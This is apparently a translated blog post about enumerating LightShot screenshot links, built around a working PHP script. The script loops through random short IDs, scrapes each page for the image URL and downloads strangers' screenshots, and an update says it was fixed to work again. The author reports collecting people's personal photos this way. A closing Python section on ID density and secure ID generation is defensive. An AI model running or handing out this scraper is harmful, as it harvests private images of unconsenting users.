
LightShot and other screenshots


Today I stumbled upon a “vulnerability” in LightShot, the instant screenshot service.

It all started when I uploaded another screenshot and remembered a recent article on Habr in which user data behind links was obtained by brute force.
When I tried changing one letter in the URL, I was kindly given someone else's screenshot.

To begin with, I tried to work out the mask by which a link of the form http://prntscr.com/1npf9n is generated.
After some experiments, I realized that the mask is most likely of the form prntscr.com/1[a-z0-9] (after the digit 1 there are 4 to 5 random characters).
I also tried the links http://prntscr.com/login and http://prntscr.com/admin, for which I also saw screenshots.
Most likely the algorithm was rewritten at some point, and the current link generation algorithm is designed so that, once all combinations are exhausted, either the link length will grow to 7 characters or the mask will become prntscr.com/2[a-z0-9].
In the process I discovered one feature of the service: it does not store pictures on its own server, but uploads them via the imgur.com API and imageshack.us.

I was tormented by curiosity: "Is it possible to download all the screenshots?"
So I decided to write a small script. At first I wanted to write it in Python, but it was not installed on my work laptop, while Denwer and PHP were at hand.
Please do not kick me for my code, which was written in 5 minutes in a hurry. It is quite functional.

<?php
set_time_limit(0); // no execution time limit: the loop below runs until stopped
ob_implicit_flush(); // send output to the browser after every echo

function random_string($length) { // build a random string of the given length
    $chars = "abcdefghijklmnopqrstuvwxyz1234567890"; // allowed characters
    $numChars = strlen($chars); // number of characters in $chars
    $string = '';
    for ($i = 0; $i < $length; $i++) { // one random character per position
        $string .= substr($chars, rand(1, $numChars) - 1, 1);
    }
    return $string;
}

function get_http_response_code($url) { // HTTP status code of a URL
    $headers = get_headers($url);
    return substr($headers[0], 9, 3);
}

if (!file_exists('lightshot_images')) { // create the output directory if it is missing
    mkdir('lightshot_images', 0777);
}

$options = array(
    'http' => array(
        'method' => "GET",
        'header' => "Accept-language: en\r\n" .
            "User-Agent: Mozilla/5.0 (iPad; U; CPU OS 3_2 like Mac OS X; en-us) AppleWebKit/531.21.10 (KHTML, like Gecko) Version/4.0.4 Mobile/7B334b Safari/531.21.102011-10-16 20:23:10\r\n"
    )
);
$context = stream_context_create($options);

while (1) {
    $randstring = random_string(5); // random part of the link
    $htmldata = file_get_contents('https://prnt.sc/m' . $randstring, false, $context); // fetch the screenshot page
    preg_match_all('/<meta name=\"twitter:image:src\" content=\"(.*?)\"\/>/is', $htmldata, $img_url); // extract the image url
    if (isset($img_url[1][0]) && strlen($img_url[1][0]) > 1) { // a match longer than 1 character means the page carries an image url
        $imgs = str_replace('//st.prntscr', 'https://st.prntscr', $img_url[1][0]);
        $localname = basename($img_url[1][0]); // last path component of the url (e.g. imagename.png)
        $localpath = "./lightshot_images/" . $localname; // local path the file is saved under
        if (get_http_response_code($imgs) != "200") {
            echo "<span style='color:red;display:block;margin-bottom:10px;font-size:14px;'>404.   " . $imgs . "    :(</span>";
        } else {
            file_put_contents($localpath, file_get_contents($imgs, false, $context)); // fetch and store the image (curl would also work here)
            echo "<span style='color:green;display:block;margin-bottom:10px;font-size:14px;'> - " . $localname . " , url - http://prntscr.com/m" . $randstring . " ,   " . $imgs . "</span>";
        }
    } else {
        echo "<span style='color:red;display:block;margin-bottom:10px;font-size:14px;'>  http://prntscr.com/m" . $randstring . "  </span>";
    }
}
?>


The result of running it in the browser (as you can see, ~95% of the randomly generated links lead to screenshots):
[image]
As a result, I downloaded a whole bunch of screenshots, among which are overly personal photos of people, screenshots of code, and many other interesting things.
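
The ~95% hit rate follows from how densely the short [a-z0-9] ID space is filled. The sketch below is an added example, not code from the original post: it computes that density and shows how a service could size and generate link IDs from a CSPRNG instead. The issued-link count and the 2**64 guesses-per-hit target are assumptions.

```python
import secrets
import string

# Alphabet from the mask observed in the post: [a-z0-9]
ALPHABET = string.ascii_lowercase + string.digits


def hit_probability(length: int, issued: int, alphabet: str = ALPHABET) -> float:
    """Chance that one uniformly random ID of this length is a live link."""
    return min(1.0, issued / len(alphabet) ** length)


def min_length_for(issued: int, guesses_per_hit: int, alphabet: str = ALPHABET) -> int:
    """Shortest ID length at which finding one live link takes, on average,
    at least `guesses_per_hit` random guesses. Integer math, no float rounding."""
    length = 1
    while len(alphabet) ** length < issued * guesses_per_hit:
        length += 1
    return length


def new_link_id(length: int, alphabet: str = ALPHABET) -> str:
    """Draw every character from the OS CSPRNG, independent of upload order."""
    return "".join(secrets.choice(alphabet) for _ in range(length))


if __name__ == "__main__":
    # Constructed figure: the post reports ~95% of random 5-character suffixes
    # resolving, so assume about 0.95 * 36**5 links issued under one prefix.
    issued = int(0.95 * 36 ** 5)
    print(f"5 chars: p(hit) = {hit_probability(5, issued):.2f}")
    # Assumed target: 2**64 random guesses per live link on average.
    need = min_length_for(issued, 2 ** 64)
    print(f"length needed: {need}, p(hit) = {hit_probability(need, issued):.1e}")
    print("sample id:", new_link_id(need))
```

Longer random IDs only remove guessability; a screenshot that must stay private still needs an access check on the link itself.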

UPD 2018: I corrected the script to reflect the changes made on LightShot. Now it works again.

Source: https://habr.com/ru/post/197228/

